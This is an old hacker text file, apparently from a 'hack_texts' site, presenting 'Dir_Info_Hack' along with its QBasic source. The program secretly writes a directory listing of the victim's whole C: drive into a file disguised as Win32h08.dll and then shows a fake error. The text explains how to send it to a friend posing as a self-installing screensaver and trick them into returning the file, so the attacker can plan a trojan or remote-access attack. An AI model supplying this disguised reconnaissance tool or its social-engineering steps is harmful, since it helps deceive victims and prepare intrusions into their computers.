-=by NiDgiD & Kraek=-
http://members.tripod.com/~hack_texts/

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Dir_Info_Hack cheezy prog v1.2

Dir_Info_Hack is a little program designed by NiDgiD & Kraek to map out 
someone's computer. What it does is uses a dos command (dir/s> filename). 
It is not a hack in itself but it used for you to view their system files 
to help you plan an attack (via trojan, remote access, or whatever it is 
that you use). Here's how it works. The program needs a second or two for 
it to load. When it says: "Loading (this may take a few seconds)...", then 
it is saving a directory listing to their Win32h08.dll file as for this 
version, it only maps their C:

When the program has finished it's stuff, it gives 
them the error: 'Can't load burn32.exe - error 14'

Now, here is how this is used..
You want to have your friends computer mapped out because you know that 
you will only have a little amount of time to hack him.... You send him 
this program via email, icq, ftp, etc., telling him it's this new cool 
self-installing screen saver called Setup32.exe (dont send him the zip 
file this came in or he will get this text file!!!)... Now, you message 
him asking to search his system for Win32h08.dll file because you need 
it for a game.. once he lamely sends it to you, open it with notepad, 
and bang.. you have his entire computer mapped out. have phun!

-=by NiDgiD & Kraek=-
http://members.tripod.com/~hack_texts/

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Qbasic 4.5 source:

CLS

PRINT "Loading (this may take a few seconds)..."
COLOR 7
SHELL "c:"
SHELL "cd\"
SHELL "dir/s> c:\windows\system\Win32h08.dll"
CLS
PRINT "Can't load burn32.exe"
END
